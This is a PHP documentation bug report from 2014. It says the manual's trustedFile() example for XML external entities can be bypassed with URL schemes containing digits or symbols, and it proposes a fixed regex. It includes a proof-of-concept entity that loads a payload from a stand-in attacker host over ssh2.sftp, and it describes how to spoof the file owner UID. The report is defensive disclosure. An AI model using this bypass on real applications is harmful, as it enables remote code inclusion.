Doc #68368 [NEW]: Insecure example

From: Date: Thu, 06 Nov 2014 23:33:18 +0000
Subject: Doc #68368 [NEW]: Insecure example
Groups: php.doc.bugs 
Request: Send a blank email to doc-bugs+get-11612@lists.php.net to get a copy of this message
From: clicky at erebot dot net Operating system: irrelevant PHP version: Irrelevant Package: Documentation problem Bug Type: Documentation Problem Bug description:Insecure example Description: ------------ --- From manual page: http://www.php.net/example.xml-external-entity --- function trustedFile($file) { // only trust local files owned by ourselves if (!preg_match("@^([a-z]+)\:\/\/@i", $file) && fileowner($file) == getmyuid()) { return true; } return false; } --- This function is not secure as it does not handle schemes containing special characters (digits, '+', '.' or '-') in them. In some circumstances, PHP may define URL wrappers with such names, eg. when the SSH2 extension is installed. Test script: --------------- One way to pass the trustedFile() checks is to load a remote file using SFTP by replacing the following line in xmltest.xml : <!ENTITY systemEntity SYSTEM "xmltest2.xml"> with: <!ENTITY systemEntity SYSTEM "ssh2.sftp://user:pass@evil.example.com/payload.xml"> Also, since the ssh2.sftp wrapper supports stat() calls, it is possible to craft a remote file such that its owner UID matches the current script's owner UID. Based on RFC 3986, this issue can be trivially fixed by changing the regex to: "@^([a-z][a-z0-9+.-]*)\:\/\/@i" Expected result: ---------------- Even though the code given on that page is only an example, it could be interpreted as guidance towards secure parsing of XML documents. Plus, the code specifically says that only local files are "trusted". I would thus expect it to reject attempts to include and execute code from remote resources. Actual result: -------------- <CHAPTER> <TITLE>Title &plainEntity;</TITLE> <PARA> <INFORMALTABLE> <TGROUP COLS="3"> <TBODY> <ROW><ENTRY>a1</ENTRY><ENTRY MOREROWS="1">b1</ENTRY><ENTRY>c1</ENTRY></ROW> <ROW><ENTRY>a2</ENTRY><ENTRY>c2</ENTRY></ROW> <ROW><ENTRY>a3</ENTRY><ENTRY>b3</ENTRY><ENTRY>c3</ENTRY></ROW> </TBODY> </TGROUP> </INFORMALTABLE> </PARA> <FOO> <ELEMENT ATTRIB="value"></ELEMENT> &testEnt; This is some more PHP code being executed. </FOO> <SECTION ID="about"> <TITLE>About this Document</TITLE> <PARA> <!-- this is a comment --> Hi! This is PHP version 5.4.33 </PARA> </SECTION> </CHAPTER>XML error: Invalid URI at line 28 (note: the "XML error" at the end is triggered by the use of a path to a non-existent DTD in xmltest.xml on line 2 [/just/a/test.dtd] and is not related to this bug) -- Edit bug report at https://bugs.php.net/bug.php?id=68368&edit=1 -- Try a snapshot (PHP 5.4): https://bugs.php.net/fix.php?id=68368&r=trysnapshot54 Try a snapshot (PHP 5.5): https://bugs.php.net/fix.php?id=68368&r=trysnapshot55 Try a snapshot (trunk): https://bugs.php.net/fix.php?id=68368&r=trysnapshottrunk Fixed in SVN: https://bugs.php.net/fix.php?id=68368&r=fixed Fixed in release: https://bugs.php.net/fix.php?id=68368&r=alreadyfixed Need backtrace: https://bugs.php.net/fix.php?id=68368&r=needtrace Need Reproduce Script: https://bugs.php.net/fix.php?id=68368&r=needscript Try newer version: https://bugs.php.net/fix.php?id=68368&r=oldversion Not developer issue: https://bugs.php.net/fix.php?id=68368&r=support Expected behavior: https://bugs.php.net/fix.php?id=68368&r=notwrong Not enough info: https://bugs.php.net/fix.php?id=68368&r=notenoughinfo Submitted twice: https://bugs.php.net/fix.php?id=68368&r=submittedtwice register_globals: https://bugs.php.net/fix.php?id=68368&r=globals PHP 4 support discontinued: https://bugs.php.net/fix.php?id=68368&r=php4 Daylight Savings: https://bugs.php.net/fix.php?id=68368&r=dst IIS Stability: https://bugs.php.net/fix.php?id=68368&r=isapi Install GNU Sed: https://bugs.php.net/fix.php?id=68368&r=gnused Floating point limitations: https://bugs.php.net/fix.php?id=68368&r=float No Zend Extensions: https://bugs.php.net/fix.php?id=68368&r=nozend MySQL Configuration Error: https://bugs.php.net/fix.php?id=68368&r=mysqlcfg

« previous php.doc.bugs (#11612) next »